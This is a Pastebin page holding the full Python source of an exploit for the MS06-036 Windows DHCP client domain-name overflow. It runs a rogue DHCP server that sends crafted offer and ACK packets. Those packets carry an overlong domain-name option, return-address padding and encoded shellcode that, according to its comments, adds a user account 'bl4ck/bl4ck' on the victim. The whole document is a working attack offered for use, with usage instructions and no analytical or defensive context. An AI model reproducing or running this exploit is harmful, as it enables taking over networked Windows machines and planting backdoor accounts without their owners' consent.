Advertisement
FlyFar

Exploit.Python.Ms06-036.a - Source Code

Jul 6th, 2023
724
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.07 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # by redsand@blacksecurity.org
  5. #   this (like any thing) would not be possible w/out the bl4ck team.
  6. #   thanks guys.
  7. #
  8.  
  9. import sys, os
  10.  
  11. sys.path.append("pydhcplib")
  12.  
  13. from scapy import *
  14.  
  15. from pydhcplib.dhcp_packet import *
  16. from pydhcplib.dhcp_network import *
  17. from pydhcplib.type_strlist import *
  18. from pydhcplib.type_ipv4 import *
  19. from pydhcplib.type_hw_addr import *
  20.  
  21. inet_face = "vmnet8"
  22.  
  23. default_ip = "10.31.33.7"
  24.  
  25. # user bl4ck/bl4ck
  26. # this exits via Thread (so thta we kill the dhcp thread in services.exe
  27. #
  28. # this means if services doesn't crash, it was a successful exploit
  29. #
  30. scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
  31. "\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
  32. "\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
  33. "\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
  34. "\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
  35. "\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
  36. "\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
  37. "\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
  38. "\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
  39. "\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
  40. "\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
  41. "\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
  42. "\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
  43. "\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
  44. "\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
  45.  
  46.  
  47.  
  48. netopt = {'client_listen_port':"68",
  49.            'server_listen_port':"67",
  50.            'listen_address':"0.0.0.0"}
  51.  
  52.  
  53. def substr(i,o,off):
  54.     begin=i[:off]
  55.     end=i[off+len(o):]
  56.     ret=begin+o+end
  57.     return ret
  58.  
  59. def io(i):
  60.     str=""
  61.     a=chr(i % 256)
  62.     i=i >> 8
  63.     b=chr(i % 256)
  64.     i=i >> 8
  65.     c=chr(i % 256)
  66.     i=i >> 8
  67.     d=chr(i % 256)
  68.    
  69.     str+="%c%c%c%c" % (a,b,c,d)
  70.  
  71.     return str
  72.  
  73. class Server(DhcpServer):
  74.     def __init__(self, options):
  75.         DhcpServer.__init__(self,options["listen_address"],
  76.                             options["client_listen_port"],
  77.                             options["server_listen_port"])
  78.  
  79.     def HandleDhcpDiscover(self, packet):
  80.     my_reqip = ''
  81.  
  82.     my_reqip = default_ip
  83.  
  84.     sid_i = my_reqip.rfind(".")
  85.     server_ip = my_reqip[0:sid_i] + ".254"
  86.  
  87.     our_ip = my_reqip[0:sid_i] + ".2"
  88.  
  89.     mymac = hwmac(packet.GetHardwareAddress()).str()
  90.         print "** Received discover from %s (%s)" % (mymac,my_reqip)
  91.    
  92.     mpacket = DhcpPacket()
  93.     mpacket.CreateDhcpOfferPacketFrom(packet)
  94.     mpacket.SetOption("dhcp_message_type",[2])
  95.     mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
  96.     mpacket.SetOption("siaddr", ipv4(server_ip).list())
  97.     mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
  98.     mpacket.SetOption("flags",[0,0])
  99.     mpacket.SetOption("server_identifier", ipv4(server_ip).list())
  100.     mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
  101.     mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
  102.     mpacket.SetOption("router",ipv4(our_ip).list())
  103.  
  104.         mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
  105.  
  106.     append = "\xfa\xff" + ( "\x90" * 0xff )
  107.     append = "\xfa\xff" + ( "\x90" * 0xff )
  108.     append = "\xfa\xff" + ( "\x90" * 0xff )
  109.     append = "\xfa\xff" + ( "\x90" * 0xff )
  110.     append = "\xfa\xff" + ( "\x90" * 0xff )
  111.  
  112.     p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
  113.  
  114.     print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
  115.     sendp(p, iface=inet_face, verbose=False)
  116.        
  117.     def HandleDhcpRequest(self, packet):
  118.  
  119.  
  120.     ip = packet.GetOption("request_ip_address")
  121.         sid = packet.GetOption("server_identifier")
  122.         ciaddr = packet.GetOption("ciaddr")
  123.     my_reqip = ''
  124.     try:
  125.         data = packet.options_data['request_ip_address']
  126.         for i in range(0,len(data),4) :
  127.                         if len(data[i:i+4]) == 4 :
  128.                             my_reqip += ipv4(data[i:i+4]).str()
  129.     except:
  130.         my_reqip = default_ip
  131.  
  132.     mymac = hwmac(packet.GetHardwareAddress()).str()
  133.         print "** Received request from %s (%s)" % (my_reqip,mymac)
  134.     sid_i = my_reqip.rfind(".")
  135.     server_ip = my_reqip[0:sid_i] + ".254"
  136.  
  137.     our_ip = my_reqip[0:sid_i] + ".2"
  138.  
  139.     mypacket = DhcpPacket()
  140.     mypacket.CreateDhcpAckPacketFrom(packet)
  141.     mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
  142.  
  143.     dumbstr = "\x90" * 0xFF
  144.  
  145.     # we're looking for a jmp/call ebx ?! or landing in our codespace
  146.     # directly
  147.  
  148.     # C5 converts to 253C
  149.     # BB = 2557
  150.     # AA = 00AC
  151.     # DD = 258C
  152.     # EE = 03B5
  153.     # 88 = 00D6
  154.     # 99 = 00EA
  155.     # F3 = 2591
  156.     # B0 = 2264
  157.     # 8F = 00c5
  158.  
  159.     eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
  160.     #eipstr = "C" * 0xFF
  161.  
  162.  
  163.     payload = "\x42" * 0xFF
  164.     payload = substr(payload, scode, 1)
  165.  
  166.  
  167.     ## find location in heap to ret2
  168.     # find offset & append as many "\x26\x6e\x43\x6e"
  169.     # to increment ebx to a non trashed location (since ebx points to our code)
  170.     # then push ebx \x53 and  \xc4 (retn)
  171.     #
  172.     # we're looking for a pop+pop+ret or a jmp/call ebx to return to our
  173.     # unicode filtered input
  174.     # note it must be iwthin the bounds of 0x0000**** - 0x0070****
  175.     # or 0x22***** <-- wont help us
  176.  
  177.     append = "\x0f\xff" + ( "\x90" * 0xff )
  178.     append += "\xfa\xff" + ( dumbstr )
  179.     append += "\xfa\xff" + ( dumbstr )
  180.     append += "\xfa\xff" + ( dumbstr )
  181.     append += "\xfa\xff" + ( dumbstr )
  182.     append += "\xfa\xff" + ( eipstr )
  183.     append += "\xfa\xff" + ( eipstr )
  184.     append += "\xfa\xff" + ( dumbstr )
  185.     append += "\xfa\xff" + ( dumbstr )
  186.     append += "\xfa\xff" + ( dumbstr )
  187.     append += "\xfa\xff" + ( dumbstr )
  188.     append += "\xfa\xff" + ( dumbstr )
  189.     append += "\xfa\xff" + ( dumbstr )
  190.     append += "\xfa\xff" + ( payload[0:254]) + "\x00"
  191.  
  192.     print "Length of our attack: %r" % len(append)
  193.  
  194.     eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
  195.     p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
  196.     print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
  197.     for i in p:
  198.         sendp(eth/i, iface=inet_face, verbose=False)
  199.  
  200.     def HandleDhcpDecline(self, packet):
  201.     return
  202.     #print "** Dhcp Declined"
  203.         #packet.PrintHeaders()
  204.         #packet.PrintOptions()
  205.        
  206.     def HandleDhcpRelease(self, packet):
  207.     return
  208.         #packet.PrintHeaders()
  209.         #packet.PrintOptions()
  210.        
  211.     def HandleDhcpInform(self, packet):
  212.     return
  213.         #packet.PrintHeaders()
  214.         #packet.PrintOptions()
  215.  
  216.  
  217.  
  218. print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
  219. print "\t by redsand@blacksecurity.org"
  220. print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
  221. print ""
  222.  
  223.  
  224. if len(sys.argv) > 1:
  225.     inet_face = sys.argv[1]
  226.  
  227. if len(sys.argv) > 2:
  228.     default_ip = sys.argv[2]
  229.  
  230. print "Listening for client requests:\n"
  231. print "Listening on interface: %s" % inet_face
  232. print "Using default address: %s" % default_ip
  233.  
  234. server = Server(netopt)
  235.  
  236. while True :
  237.     server.GetNextDhcpPacket()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement